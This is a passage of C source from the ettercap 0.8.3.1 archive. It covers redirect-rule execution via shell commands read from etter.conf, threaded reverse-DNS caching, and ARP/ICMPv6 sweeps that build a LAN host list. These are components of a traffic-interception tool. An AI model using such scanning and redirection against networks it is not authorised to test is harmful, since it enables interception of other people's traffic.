SAFE_FREE(binmask); SAFE_FREE(str_tmp); } } else /* destination specification invalid */ goto clean_abort; /* sanity check */ switch (proto) { case EC_REDIR_PROTO_IPV4: if (ntohs(re->dst_network.addr_type) != AF_INET) { DEBUG_MSG("ec_redirect(): address family mixup! - aborting"); goto clean_abort; } break; case EC_REDIR_PROTO_IPV6: if (ntohs(re->dst_network.addr_type) != AF_INET6) { DEBUG_MSG("ec_redirect(): address family mixup! - aborting"); goto clean_abort; } break; default: clean_abort: SAFE_FREE(re->name); SAFE_FREE(re->destination); SAFE_FREE(re); SAFE_FREE(str_tmp); return -E_INVALID; break; } break; case EC_REDIR_ACTION_REMOVE: /* check if entry is still present */ LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) { if (proto == re->proto && !strcmp(destination, re->destination) && sport == re->from_port && dport == re->to_port) { /* entry present - ready to be removed */ command = commands[EC_REDIR_COMMAND_REMOVE]; if (command == NULL) { DEBUG_MSG("ec_redirect(): redirect insert command for %s " "desired but not set in etter.conf - skipping...", proto == EC_REDIR_PROTO_IPV4 ? "IPv4" : "IPv6"); return -E_NOTHANDLED; } break; } } if (command == NULL) { DEBUG_MSG("ec_redirect(): redirect entry not present anymore"); return -E_INVALID; } break; default: DEBUG_MSG("ec_redirect(): no valid action defined - aborting!"); return -E_FATAL; } /* ready to complete redirect commands */ if (!strcmp(destination, "0.0.0.0/0")) { snprintf(asc_destination, MAX_ASCII_ADDR_LEN, "%s", IPV4_ANY); } else if (!strcmp(destination, "::/0")) { snprintf(asc_destination, MAX_ASCII_ADDR_LEN, "%s", IPV6_ANY); } else { snprintf(asc_destination, MAX_ASCII_ADDR_LEN, "%s", destination); } snprintf(asc_sport, 16, "%u", sport); snprintf(asc_dport, 16, "%u", dport); /* make the substitutions in the script */ str_replace(&command, "%iface", EC_GBL_OPTIONS->iface); str_replace(&command, "%destination", asc_destination); str_replace(&command, "%port", asc_sport); str_replace(&command, "%rport", asc_dport); #if defined(OS_DARWIN) || defined(OS_BSD) str_replace(&command, "%set", IPFW_SET); #endif DEBUG_MSG("ec_redirect(): execute [%s]", command); /* construct the params array for execvp */ param[0] = "sh"; param[1] = "-c"; param[2] = command; param[3] = NULL; /* execute the script */ switch (fork()) { case 0: regain_privs(); execvp(param[0], param); drop_privs(); WARN_MSG("Cannot setup redirect (command: %s), please edit your " "etter.conf file and put a valid value in redir_command_on" "|redir_command_off field\n", param[0]); SAFE_FREE(command); SAFE_FREE(re->name); SAFE_FREE(re->destination); SAFE_FREE(re); _exit(-E_INVALID); case -1: SAFE_FREE(command); return -E_INVALID; default: wait(&ret_val); if (WIFEXITED(ret_val) && WEXITSTATUS(ret_val)) { DEBUG_MSG("ec_redirect(): child exited with non-zero return " "code: %d", WEXITSTATUS(ret_val)); USER_MSG("ec_redirect(): redir_command_on had non-zero exit " "status (%d): [%s]\n", WEXITSTATUS(ret_val), command); SAFE_FREE(command); SAFE_FREE(re->name); SAFE_FREE(re->destination); SAFE_FREE(re); return -E_INVALID; } else { /* redirect command exited normally */ switch (action) { case EC_REDIR_ACTION_INSERT: /* register entry */ LIST_INSERT_HEAD(&redirect_entries, re, next); register_redir_service(name, sport, dport); break; case EC_REDIR_ACTION_REMOVE: /* remove entry from list */ LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) { if (re->proto == proto && !strcmp(re->destination, destination) && sport == re->from_port && dport == re->to_port) { LIST_REMOVE(re, next); SAFE_FREE(re->name); SAFE_FREE(re->destination); SAFE_FREE(re); } } break; default: break; } } } SAFE_FREE(command); return E_SUCCESS; } /* check and set redirect commands from etter.conf */ static int set_redir_command(ec_redir_proto_t proto, char *commands[]) { switch (proto) { case EC_REDIR_PROTO_IPV4: /* the script is not defined */ if (EC_GBL_CONF->redir_command_on == NULL) { USER_MSG("set_redir_commands(): cannot setup the redirect, did " "you uncomment the redir_command_on command on your " "etter.conf file?\n"); return -E_FATAL; } commands[EC_REDIR_COMMAND_INSERT] = strdup(EC_GBL_CONF->redir_command_on); /* the script is not defined */ if (EC_GBL_CONF->redir_command_off == NULL) { USER_MSG("set_redir_commands(): cannot remove the redirect, did " "you uncomment the redir_command_off command on your " "etter.conf file?\n"); return -E_FATAL; } commands[EC_REDIR_COMMAND_REMOVE] = strdup(EC_GBL_CONF->redir_command_off); break; #ifdef WITH_IPV6 case EC_REDIR_PROTO_IPV6: /* IPv6 redirect script is optional */ if (EC_GBL_CONF->redir6_command_on == NULL) { USER_MSG("set_redir_commands(): cannot setup the redirect for " "IPv6, did you uncomment the redir6_command_on command on " "your etter.conf file?\n"); return -E_FATAL; } commands[EC_REDIR_COMMAND_INSERT] = strdup(EC_GBL_CONF->redir6_command_on); if (EC_GBL_CONF->redir6_command_off == NULL) { USER_MSG("set_redir_commands(): cannot remove the redirect for " "IPv6, did you uncommend the redir6_command_off command in " "your etter.conf file?\n"); return -E_FATAL; } commands[EC_REDIR_COMMAND_REMOVE] = strdup(EC_GBL_CONF->redir6_command_off); break; #endif default: return -E_INVALID; } return E_SUCCESS; } /* * compile the list of registered redirects */ int ec_walk_redirects(void (*func)(struct redir_entry*)) { struct redir_entry *re, *tmp; int i = 0; DEBUG_MSG("ec_walk_redirects()"); LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) { func(re); i++; } return i ? i : -E_NOTFOUND; } /* * check if a packet matches a installed redirect */ int ec_redirect_lookup(struct packet_object *po) { struct redir_entry *re, *tmp; struct ip_addr srv_network; LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) { if (po->L4.dst == re->orig_nport) { /* port matched - now check on the IPs */ ip_addr_get_network(&po->L3.dst, &re->dst_netmask, &srv_network); if (!ip_addr_cmp(&re->dst_network, &srv_network)) return E_SUCCESS; } else if (po->L4.src == re->orig_nport) { /* port matched - now check on the IPs */ ip_addr_get_network(&po->L3.src, &re->dst_netmask, &srv_network); if (!ip_addr_cmp(&re->dst_network, &srv_network)) return E_SUCCESS; } } return -E_NOMATCH; } /* * remove all registered redirects */ void ec_redirect_cleanup(void) { struct redir_entry *re, *tmp; struct serv_entry *se, *stmp; DEBUG_MSG("ec_redirect_cleanup()"); LIST_FOREACH_SAFE(re, &redirect_entries, next, tmp) ec_redirect(EC_REDIR_ACTION_REMOVE, re->name, re->proto, re->destination, re->from_port, re->to_port); SLIST_FOREACH_SAFE(se, &redirect_services, next, stmp) { SAFE_FREE(se->name); SAFE_FREE(se); } } /* * store redirect services in a unique list */ static void register_redir_service(char *name, u_int16 from_port, u_int16 to_port) { struct serv_entry *se; DEBUG_MSG("register_redir_service(%s)", name); /* avoid duplicates */ SLIST_FOREACH(se, &redirect_services, next) if (se->from_port == from_port && se->to_port == to_port) return; SAFE_CALLOC(se, 1, sizeof(struct serv_entry)); se->name = strdup(name); se->from_port = from_port; se->to_port = to_port; SLIST_INSERT_HEAD(&redirect_services, se, next); } /* * compile the list of redirectable services */ int ec_walk_redirect_services(void (*func)(struct serv_entry*)) { struct serv_entry *se, *tmp; int i = 0; DEBUG_MSG("ec_walk_redirect_services()"); SLIST_FOREACH_SAFE(se, &redirect_services, next, tmp) { func(se); i++; } return i ? i : -E_NOTFOUND; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_resolv.c000664 000000 000000 00000031365 13711276346 016406 0ustar00rootroot000000 000000 /* ettercap -- name resolution module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifdef SIGUSR1 #include #else #include #endif #ifndef OS_WINDOWS #include #endif #define TABBIT 9 /* 2^9 bit tab entries: 512 SLISTS */ #define TABSIZE (1UL<resolve) return -E_NOTFOUND; DEBUG_MSG("host_iptoa() %s not in cache", ip_addr_ntoa(ip, tmp)); /* * The host was not in the cache but requests to resolve, * so we continue resolving it in a non-blocking manner. * We return -E_NOMATCH to indicate that we try to resolve it * and the result may be in the cache later. * That way we don't block the application if the OS is configured * to include mDNS in the host resolution process (/etc/nsswitch.conf). * Including mDNS enriches the results but heavily delays if * many hosts are online on the link. */ RESOLVQ_LOCK; ret = resolv_queue_push(ip); RESOLVQ_UNLOCK; #ifdef SIGUSR1 /* Sending signal of updated resolv queue to all resolv threads */ if (ret == E_SUCCESS) for (i = 0; i < NUM_RESOLV_THREADS; i++) pthread_kill(resolv_threads[i], SIGUSR1); #endif return -E_NOMATCH; } /* * initialize number of threads * acting as the working horses for the IP to name * resolution in the background */ void resolv_thread_init(void) { int i; char thread_name[16]; DEBUG_MSG("resolv_thread_init()"); /* initialize queue */ STAILQ_INIT(&resolv_queue_head); /* spawn resolution worker threads */ for (i = 0; i < NUM_RESOLV_THREADS; i++) { snprintf(thread_name, sizeof(thread_name), "resolver-%d", i+1); resolv_threads[i] = ec_thread_new(thread_name, "DNS resolver", &resolv_thread_main, NULL); } } /* * gracefully shut down name resolution threads: * - destroy all created threads * - flush and free resolv queue completely */ void resolv_thread_fini(void) { int i; struct queue_entry *entry; DEBUG_MSG("resolv_thread_fini()"); /* destroy resolution worker threads */ for (i = 0; i < NUM_RESOLV_THREADS; i++) /* check if thread exists */ if (strcmp(ec_thread_getname(resolv_threads[i]), "NR_THREAD")) /* send cancel signal to thread */ ec_thread_destroy(resolv_threads[i]); /* empty queue and free allocated memory if applicable */ RESOLVQ_LOCK; while (!STAILQ_EMPTY(&resolv_queue_head)) { entry = STAILQ_FIRST(&resolv_queue_head); STAILQ_REMOVE_HEAD(&resolv_queue_head, entry, next); SAFE_FREE(entry); } RESOLVQ_UNLOCK; } /* * this function the resolution threads wait in this function * until a IP address is to be resolved and inserted into the * name cache. With many IP hosts on the link, the number of * parallel threads can be increased by NUM_RESOLV_THREADS. */ EC_THREAD_FUNC(resolv_thread_main) { struct ip_addr ip; char host[MAX_HOSTNAME_LEN]; char tmp[MAX_ASCII_ADDR_LEN]; int ret = 0; #ifdef SIGUSR1 int sig; sigset_t sigmask; #endif /* variable not used */ (void) EC_THREAD_PARAM; /* init the thread */ ec_thread_init(); #ifdef SIGUSR1 /* initialize signal mask non-blocking */ sigfillset(&sigmask); pthread_sigmask(SIG_UNBLOCK, &sigmask, NULL); #endif /* wait for something to do */ LOOP { /* provide the chance to cancel the thread */ CANCELLATION_POINT(); /* check if something is in the queue */ RESOLVQ_LOCK; ret = resolv_queue_pop(&ip); RESOLVQ_UNLOCK; /* nothing to do - booring !! */ if (ret != E_SUCCESS) { /* wait if something new comes in to do */ #ifdef SIGUSR1 while (sigwait(&sigmask, &sig) == 0) if (sig == SIGUSR1) break; #else ec_usleep(SEC2MICRO(1)); #endif /* broke off waiting - start over checking the queue */ continue; } /* * yeah, we got something to do - lets rock..... * In any case the name cache is updated so that a second call of * of host_iptoa() gets a result. */ if (resolv_dns(&ip, host)) { /* * insert the "" in the cache so we don't search for * non existent hosts every new query. */ DEBUG_MSG("resolv_dns: not found for %s", ip_addr_ntoa(&ip, tmp)); RESOLVC_LOCK; resolv_cache_insert(&ip, ""); RESOLVC_UNLOCK; } else { DEBUG_MSG("resolv_dns: %s found for %s", host, ip_addr_ntoa(&ip, tmp)); /* insert the result in the cache for later use */ RESOLVC_LOCK; resolv_cache_insert(&ip, host); RESOLVC_UNLOCK; } } return NULL; } /* * perform the ip to name resolution as a dedicated thread. */ static int resolv_dns(struct ip_addr *ip, char *hostname) { struct sockaddr_storage ss; struct sockaddr_in *sa4; struct sockaddr_in6 *sa6; socklen_t sa_len; /* prepare struct */ switch (ntohs(ip->addr_type)) { case AF_INET: sa4 = (struct sockaddr_in *)&ss; sa4->sin_family = AF_INET; ip_addr_cpy((u_char*)&sa4->sin_addr.s_addr, ip); sa_len = sizeof(struct sockaddr_in); break; case AF_INET6: sa6 = (struct sockaddr_in6 *)&ss; sa6->sin6_family = AF_INET6; ip_addr_cpy((u_char*)&sa6->sin6_addr.s6_addr, ip); sa_len = sizeof(struct sockaddr_in6); break; } /* resolve */ return getnameinfo((struct sockaddr *)&ss, sa_len, hostname, MAX_HOSTNAME_LEN, NULL, 0, NI_NAMEREQD); } /* * search in the cache for an already * resolved host */ static int resolv_cache_search(struct ip_addr *ip, char *name) { struct resolv_entry *r; u_int32 h; char tmp[MAX_ASCII_ADDR_LEN]; /* calculate the hash */ h = fnv_32(ip->addr, ntohs(ip->addr_len)) & TABMASK; SLIST_FOREACH(r, &resolv_cache_head[h], next) { if (!ip_addr_cmp(&r->ip, ip)) { /* found in the cache */ DEBUG_MSG("resolv_cache_search: found: %s -> %s", ip_addr_ntoa(ip, tmp), r->hostname); strlcpy(name, r->hostname, MAX_HOSTNAME_LEN - 1); return E_SUCCESS; } } /* cache miss */ return -E_NOTFOUND; } /* * insert an entry in the cache */ void resolv_cache_insert(struct ip_addr *ip, char *name) { struct resolv_entry *r; u_int32 h; pthread_t pid; char tmp[MAX_ASCII_ADDR_LEN]; /* * make sure this function is not called by the main thread. * this is important because parallel writing of the cache * can lead to segmentation faults due to race conditions */ pid = pthread_self(); if (pthread_equal(pid, ec_thread_getpid(NULL))) { DEBUG_MSG("resolv_cache_insert: not called by a thread - aborting"); return; } /* calculate the hash */ h = fnv_32(ip->addr, ntohs(ip->addr_len)) & TABMASK; /* * search if it is already in the cache. * this will pervent passive insertion to overwrite * previous cached results */ SLIST_FOREACH(r, &resolv_cache_head[h], next) { /* found in the cache skip it */ if (!ip_addr_cmp(&r->ip, ip)) { DEBUG_MSG("resolv_cache_insert: %s already in cache - skipping", ip_addr_ntoa(ip, tmp)); return; } } DEBUG_MSG("resolv_cache_insert: no entry found for %s", ip_addr_ntoa(ip, tmp)); SAFE_CALLOC(r, 1, sizeof(struct resolv_entry)); memcpy(&r->ip, ip, sizeof(struct ip_addr)); r->hostname = strdup(name); SLIST_INSERT_HEAD(&(resolv_cache_head[h]), r, next); DEBUG_MSG("resolv_cache_insert: inserted %s --> %s", tmp, name); } /* * wrapper function for the passive name recognition * ensuring syncronization with active name resolving * threads */ void resolv_cache_insert_passive(struct ip_addr *ip, char *name) { /* wait for mutex and write cache entry */ RESOLVC_LOCK; resolv_cache_insert(ip, name); RESOLVC_UNLOCK; } /* * pushing a resolution request to the queue */ int resolv_queue_push(struct ip_addr *ip) { struct queue_entry *entry; char tmp[MAX_ASCII_ADDR_LEN]; int i = 0; /* avoid pushing duplicate IPs to the queue */ STAILQ_FOREACH(entry, &resolv_queue_head, next) { if (!ip_addr_cmp(&entry->ip, ip)) return -E_DUPLICATE; /* count queue length */ i++; } /* avoid memory exhaustion - limit queue length */ if (i >= MAX_RESOLVQ_LEN) { DEBUG_MSG("resolv_queue_push(): maximum resolv queue length reached"); return -E_INVALID; } /* allocate memory for new queue entry and add to queue */ SAFE_CALLOC(entry, 1, sizeof(struct queue_entry)); memcpy(&entry->ip, ip, sizeof(struct ip_addr)); STAILQ_INSERT_TAIL(&resolv_queue_head, entry, next); DEBUG_MSG("resolv_queue_push(): %s queued", ip_addr_ntoa(ip, tmp)); return E_SUCCESS; } /* * popping and returning a resolution request from the queue */ int resolv_queue_pop(struct ip_addr *ip) { struct queue_entry *entry; char tmp[MAX_ASCII_ADDR_LEN]; /* check if queue is emtpy */ if (STAILQ_EMPTY(&resolv_queue_head)) return -E_NOMATCH; /* copy IP address to caller's memory */ entry = STAILQ_FIRST(&resolv_queue_head); memcpy(ip, &entry->ip, sizeof(struct ip_addr)); /* remove entry from queue and free memory */ STAILQ_REMOVE_HEAD(&resolv_queue_head, entry, next); SAFE_FREE(entry); DEBUG_MSG("resolv_queue_pop(): %s returned and removed from queue", ip_addr_ntoa(ip, tmp)); return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_scan.c000664 000000 000000 00000055153 13711276346 016021 0ustar00rootroot000000 000000 /* ettercap -- initial scan to build the hosts list Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include /* globals */ static pthread_mutex_t scan_mutex = PTHREAD_MUTEX_INITIALIZER; /* * SCAN_{LOCK,UNLOCK} and SCANUI_{LOCK,UNLOCK} are two macros * that handles the SAME mutex "scan_mutex". * They are intended to cancel threads that are not getting * the lock (Pressing Crtl+S multiple times while scanning). * They are split because the lock is used in different functions * of different types (void/void*). */ #define SCAN_LOCK do{ if (pthread_mutex_trylock(&scan_mutex)) { \ ec_thread_exit(); return NULL;} \ } while(0) #define SCAN_UNLOCK do{ pthread_mutex_unlock(&scan_mutex); } while(0) #define SCANUI_LOCK do{ if (pthread_mutex_trylock(&scan_mutex)) { \ return; } \ } while (0) #define SCANUI_UNLOCK SCAN_UNLOCK #define EC_CHECK_LIBNET_VERSION(major,minor) \ (LIBNET_VERSION_MAJOR > (major) || \ (LIBNET_VERSION_MAJOR == (major) && LIBNET_VERSION_MINOR >= (minor))) /* used to create the random list */ static LIST_HEAD (, ip_list) ip_list_head; static struct ip_list **rand_array; /* protos */ void build_hosts_list(void); void del_hosts_list(void); static void scan_netmask(); #ifdef WITH_IPV6 static void scan_ip6_onlink(); #endif static void scan_targets(); int scan_load_hosts(char *filename); int scan_save_hosts(char *filename); void add_host(struct ip_addr *ip, u_int8 mac[MEDIA_ADDR_LEN], char *name); static void random_list(struct ip_list *e, int max); static void get_response(struct packet_object *po); static EC_THREAD_FUNC(scan_thread); void __init hook_init(void); static void hosts_list_hook(struct packet_object *po); /*******************************************/ /* * build the initial host list with ARP requests */ void build_hosts_list(void) { struct hosts_list *hl; int nhosts = 0; DEBUG_MSG("build_hosts_list"); /* don't create the list in bridged mode */ if (EC_GBL_SNIFF->type == SM_BRIDGED) return; /* * load the list from the file * this option automatically enable EC_GBL_OPTIONS->silent */ if (EC_GBL_OPTIONS->load_hosts) { scan_load_hosts(EC_GBL_OPTIONS->hostsfile); LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) nhosts++; INSTANT_USER_MSG("%d hosts added to the hosts list...\n", nhosts); return; } /* in silent mode, the list should not be created */ if (EC_GBL_OPTIONS->silent) return; /* it not initialized don't make the list */ if (EC_GBL_IFACE->lnet == NULL) return; /* no target defined... */ if (EC_GBL_TARGET1->all_ip && EC_GBL_TARGET2->all_ip && EC_GBL_TARGET1->all_ip6 && EC_GBL_TARGET2->all_ip6 && !EC_GBL_TARGET1->scan_all && !EC_GBL_TARGET2->scan_all) return; /* delete the previous list */ del_hosts_list(); /* check the type of UI we are running under... */ if (EC_GBL_UI->type == UI_TEXT || EC_GBL_UI->type == UI_DAEMONIZE) /* in text mode and daemonized call the function directly */ scan_thread(NULL); else /* do the scan in a separate thread */ ec_thread_new("scan", "scanning thread", &scan_thread, NULL); } /* * the thread responsible of the hosts scan */ static EC_THREAD_FUNC(scan_thread) { struct hosts_list *hl; int i = 1, ret; int nhosts = 0; int threadize = 1; /* variable not used */ (void) EC_THREAD_PARAM; DEBUG_MSG("scan_thread"); /* in text mode and demonized this function should NOT be a thread */ if (EC_GBL_UI->type == UI_TEXT || EC_GBL_UI->type == UI_DAEMONIZE) threadize = 0; #ifdef OS_MINGW /* FIXME: for some reason under windows it does not work in thread mode * to be investigated... */ threadize = 0; #endif /* if necessary, don't create the thread */ if (threadize) ec_thread_init(); /* Only one thread is allowed to scan at a time */ SCAN_LOCK; /* if sniffing is not yet started we need a decoder for the ARP/ND replies */ if (!EC_GBL_SNIFF->active) capture_start(EC_GBL_IFACE); /* * create a simple decode thread, it will call * the right HOOK POINT. so we only have to hook to * ARP packets. */ hook_add(HOOK_PACKET_ARP_RP, &get_response); #ifdef WITH_IPV6 hook_add(HOOK_PACKET_ICMP6_NADV, &get_response); hook_add(HOOK_PACKET_ICMP6_RPLY, &get_response); hook_add(HOOK_PACKET_ICMP6_PARM, &get_response); #endif /* * if at least one ip target is ANY, scan the whole netmask * * the pid parameter is used to kill the thread if * the user request to stop the scan. * * FIXME: ipv4 host gets scanned twice if in target list */ if(EC_GBL_TARGET1->all_ip || EC_GBL_TARGET2->all_ip) { scan_netmask(); #ifdef WITH_IPV6 if (EC_GBL_OPTIONS->ip6scan) scan_ip6_onlink(); #endif } scan_targets(); /* * free the temporary array for random computations * allocated in random_list() */ SAFE_FREE(rand_array); /* * wait a second for some delayed packets... * the other thread is listening for ARP pachets */ ec_usleep(SEC2MICRO(1)); /* remove the hooks for parsing the ARP/ND packets during scan */ hook_del(HOOK_PACKET_ARP, &get_response); #ifdef WITH_IPV6 hook_del(HOOK_PACKET_ICMP6_NADV, &get_response); hook_del(HOOK_PACKET_ICMP6_RPLY, &get_response); hook_del(HOOK_PACKET_ICMP6_PARM, &get_response); #endif /* if sniffing is not started we have to stop the decoder after scan */ if (!EC_GBL_SNIFF->active) capture_stop(EC_GBL_IFACE); /* Unlock Mutex */ SCAN_UNLOCK; /* count the hosts and print the message */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { char tmp[MAX_ASCII_ADDR_LEN]; (void)tmp; DEBUG_MSG("Host: %s", ip_addr_ntoa(&hl->ip, tmp)); nhosts++; } INSTANT_USER_MSG("%d hosts added to the hosts list...\n", nhosts); /* update host list*/ ui_update(UI_UPDATE_HOSTLIST); /* * resolve the hostnames only if we are scanning * the lan. when loading from file, hostnames are * already in the file. */ if (!EC_GBL_OPTIONS->load_hosts && EC_GBL_OPTIONS->resolve) { char title[50]; snprintf(title, sizeof(title)-1, "Resolving %d hostnames...", nhosts); INSTANT_USER_MSG("%s\n", title); LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { char tmp[MAX_HOSTNAME_LEN]; host_iptoa(&hl->ip, tmp); hl->hostname = strdup(tmp); ret = ui_progress(title, i++, nhosts); /* user has requested to stop the task */ if (ret == UI_PROGRESS_INTERRUPTED) { INSTANT_USER_MSG("Interrupted by user. Partial results may have been recorded...\n"); ec_thread_exit(); } } } /* save the list to the file */ if (EC_GBL_OPTIONS->save_hosts) scan_save_hosts(EC_GBL_OPTIONS->hostsfile); /* if necessary, don't create the thread */ if (threadize) ec_thread_exit(); /* NOT REACHED */ return NULL; } /* * delete the hosts list */ void del_hosts_list(void) { struct hosts_list *hl, *tmp = NULL; SCANUI_LOCK; LIST_FOREACH_SAFE(hl, &EC_GBL_HOSTLIST, next, tmp) { SAFE_FREE(hl->hostname); LIST_REMOVE(hl, next); SAFE_FREE(hl); } SCANUI_UNLOCK; } /* * receives the ARP and ICMPv6 ND packets */ static void get_response(struct packet_object *po) { struct ip_list *t; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("get_response from %s", ip_addr_ntoa(&po->L3.src, tmp)); /* if at least one target is the whole netmask, add the entry */ if (EC_GBL_TARGET1->scan_all || EC_GBL_TARGET2->scan_all) { add_host(&po->L3.src, po->L2.src, NULL); return; } /* else only add arp and icmp6 replies within the targets */ /* search in target 1 */ LIST_FOREACH(t, &EC_GBL_TARGET1->ips, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { add_host(&po->L3.src, po->L2.src, NULL); return; } /* search in target 2 */ LIST_FOREACH(t, &EC_GBL_TARGET2->ips, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { add_host(&po->L3.src, po->L2.src, NULL); return; } #ifdef WITH_IPV6 /* same for IPv6 */ /* search in target 1 */ LIST_FOREACH(t, &EC_GBL_TARGET1->ip6, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { return; } /* search in target 2 */ LIST_FOREACH(t, &EC_GBL_TARGET2->ip6, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { add_host(&po->L3.src, po->L2.src, NULL); return; } #endif } /* * scan the netmask to find all hosts */ static void scan_netmask(void) { u_int32 netmask, current, myip; int nhosts, i, ret; struct ip_addr scanip; struct ip_list *e, *tmp; char title[100]; netmask = *EC_GBL_IFACE->netmask.addr32; myip = *EC_GBL_IFACE->ip.addr32; /* the number of hosts in this netmask */ nhosts = ntohl(~netmask); DEBUG_MSG("scan_netmask: %d hosts", nhosts); INSTANT_USER_MSG("Randomizing %d hosts for scanning...\n", nhosts); /* scan the netmask */ for (i = 1; i <= nhosts; i++) { /* calculate the ip */ current = (myip & netmask) | htonl(i); ip_addr_init(&scanip, AF_INET, (u_char *)¤t); SAFE_CALLOC(e, 1, sizeof(struct ip_list)); memcpy(&e->ip, &scanip, sizeof(struct ip_addr)); /* add to the list randomly */ random_list(e, i); } snprintf(title, sizeof(title)-1, "Scanning the whole netmask for %d hosts...", nhosts); INSTANT_USER_MSG("%s\n", title); i = 1; /* send the actual ARP request */ LIST_FOREACH(e, &ip_list_head, next) { /* send the arp request */ send_arp(ARPOP_REQUEST, &EC_GBL_IFACE->ip, EC_GBL_IFACE->mac, &e->ip, MEDIA_BROADCAST); /* update the progress bar */ ret = ui_progress(title, i++, nhosts); /* user has requested to stop the task */ if (ret == UI_PROGRESS_INTERRUPTED) { INSTANT_USER_MSG("Scan interrupted by user. Partial results may have been recorded...\n"); /* stop the capture thread if sniffing is not active */ if (!EC_GBL_SNIFF->active) capture_stop(EC_GBL_IFACE); hook_del(HOOK_PACKET_ARP, &get_response); /* delete the temporary list */ LIST_FOREACH_SAFE(e, &ip_list_head, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } SCAN_UNLOCK; /* cancel the scan thread */ ec_thread_exit(); } /* wait for a delay */ ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } /* delete the temporary list */ LIST_FOREACH_SAFE(e, &ip_list_head, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } DEBUG_MSG("scan_netmask: Complete"); } #ifdef WITH_IPV6 /* * probe active IPv6 hosts */ static void scan_ip6_onlink(void) { int ret, i = 0; struct net_list *e; struct ip_addr an; char title[100]; ip_addr_init(&an, AF_INET6, (u_char *)IP6_ALL_NODES); snprintf(title, sizeof(title)-1, "Probing %d seconds for active IPv6 nodes ...", EC_GBL_CONF->icmp6_probe_delay); INSTANT_USER_MSG("%s\n", title); DEBUG_MSG("scan_ip6_onlink: "); /* go through the list of IPv6 addresses on the selected interface */ LIST_FOREACH(e, &EC_GBL_IFACE->ip6_list, next) { /* * ping to all-nodes from all ip addresses to get responses from all * IPv6 networks (global, link-local, ...) */ send_L2_icmp6_echo(&e->ip, &an, LLA_IP6_ALLNODES_MULTICAST); #if EC_CHECK_LIBNET_VERSION(1,2) /* * sending this special icmp probe motivates hosts to respond with a icmp * error message even if they are configured not to respond to icmp requests. * since libnet < 1.2 has a bug when sending IPv6 option headers * we can only use this type of probe if we have at least libnet 1.2 or above */ send_L2_icmp6_echo_opt(&e->ip, &an, IP6_DSTOPT_UNKN, sizeof(IP6_DSTOPT_UNKN), LLA_IP6_ALLNODES_MULTICAST); #endif } for (i=0; i<=EC_GBL_CONF->icmp6_probe_delay * 1000; i++) { /* update the progress bar */ ret = ui_progress(title, i, EC_GBL_CONF->icmp6_probe_delay * 1000); /* user has requested to stop the task */ if (ret == UI_PROGRESS_INTERRUPTED) { INSTANT_USER_MSG("Scan interrupted by user. Partial results may have been recorded...\n"); /* stop the capture thread if sniffing is not active */ if (!EC_GBL_SNIFF->active) capture_stop(EC_GBL_IFACE); hook_del(HOOK_PACKET_ICMP6_NADV, &get_response); hook_del(HOOK_PACKET_ICMP6_RPLY, &get_response); hook_del(HOOK_PACKET_ICMP6_PARM, &get_response); SCAN_UNLOCK; /* cancel the scan thread */ ec_thread_exit(); } /* wait for a delay */ ec_usleep(MILLI2MICRO(1)); // 1ms } } #endif /* * scan only the target hosts */ static void scan_targets(void) { int nhosts = 0, found, n = 1, ret; struct ip_list *e, *i, *m, *tmp; char title[100]; #ifdef WITH_IPV6 struct ip_addr ip; struct ip_addr sn; u_int8 tmac[MEDIA_ADDR_LEN]; #endif DEBUG_MSG("scan_targets: merging targets..."); /* * make an unique list merging the two target * and count the number of hosts to be scanned */ /* first get all the target1 ips */ LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { SAFE_CALLOC(e, 1, sizeof(struct ip_list)); memcpy(&e->ip, &i->ip, sizeof(struct ip_addr)); nhosts++; /* add to the list randomly */ random_list(e, nhosts); } #ifdef WITH_IPV6 LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) { SAFE_CALLOC(e, 1, sizeof(struct ip_list)); memcpy(&e->ip, &i->ip, sizeof(struct ip_addr)); nhosts++; random_list(e, nhosts); } #endif /* then merge the target2 ips */ LIST_FOREACH(i, &EC_GBL_TARGET2->ips, next) { found = 0; /* search if it is already in the list */ LIST_FOREACH(m, &ip_list_head, next) if (!ip_addr_cmp(&m->ip, &i->ip)) { found = 1; break; } /* add it */ if (!found) { SAFE_CALLOC(e, 1, sizeof(struct ip_list)); memcpy(&e->ip, &i->ip, sizeof(struct ip_addr)); nhosts++; /* add to the list randomly */ random_list(e, nhosts); } } #ifdef WITH_IPV6 LIST_FOREACH(i, &EC_GBL_TARGET2->ip6, next) { found = 0; LIST_FOREACH(m, &ip_list_head, next) if (!ip_addr_cmp(&m->ip, &i->ip)) { found = 1; break; } if (!found) { SAFE_CALLOC(e, 1, sizeof(struct ip_list)); 